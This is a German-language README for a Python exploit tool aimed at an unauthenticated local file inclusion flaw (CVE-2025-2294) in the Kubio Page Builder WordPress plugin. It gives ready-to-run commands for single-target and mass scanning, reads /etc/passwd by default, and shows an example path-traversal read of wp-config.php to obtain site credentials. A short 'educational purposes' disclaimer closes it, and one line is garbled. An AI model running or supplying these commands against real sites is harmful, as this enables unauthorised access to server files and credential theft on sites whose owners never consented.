
Unauthenticated Local File Inclusion (LFI)-Exploit für das Kubio Page Builder WordPress-Plugin (CVE-2025-2294). Unterstützt Einzelziele, Massen-Scanning, Versionserkennung und das Lesen benutzerdefinierter Dateipfade.
Local File Inclusion (LFI)-Exploit für das WordPress-Plugin Kubio Page Builder (Versionen ≤ 2.5.1).
Dieses Tool nutzt eine unauthentifizierte LFI-Schwachstelle im Plugin Kubio Page Builder (CVE-2025-2294) aus, die es Angreifern ermöglicht, sensible Dateien auf verwundbaren WordPress-Installationen zu lesen.
-u)-l)-o)git clone https://github.com/mrrivaldo/CVE-2025-2294.git
python3 cve-2025-2294.py -u https://vulnerable-site.com
python3 cve-2025-2294.py -u https://vulnerable-site.com -f ../../wp-config.php
python3 cve-2025-2294.py -l targets.txt -o results.txt
python3 cve-2025-2294.py --help
| Option | Beschreibung |
|---|---|
-u, --url | Einzelne Ziel-URL |
-l, --list | Datei mit Liste der Ziele |
-f, --file | Zu lesende Datei (Standard: /etc/passwd) |
-o, --output | Verwundbare Ziele in Datei speichern |
targets.txt:
https://wordpress-site1.com
http://wordpress-site2.com
https://another-vulnerable-site.com
Dieses Tool dient nur zu Bildungszwecken. Der Entwickler übernimmt keine Verantwortung für Missbrauch. Holen Sie stets eine entsprechende Genehmigung ein, bevor Sie Systeme testen.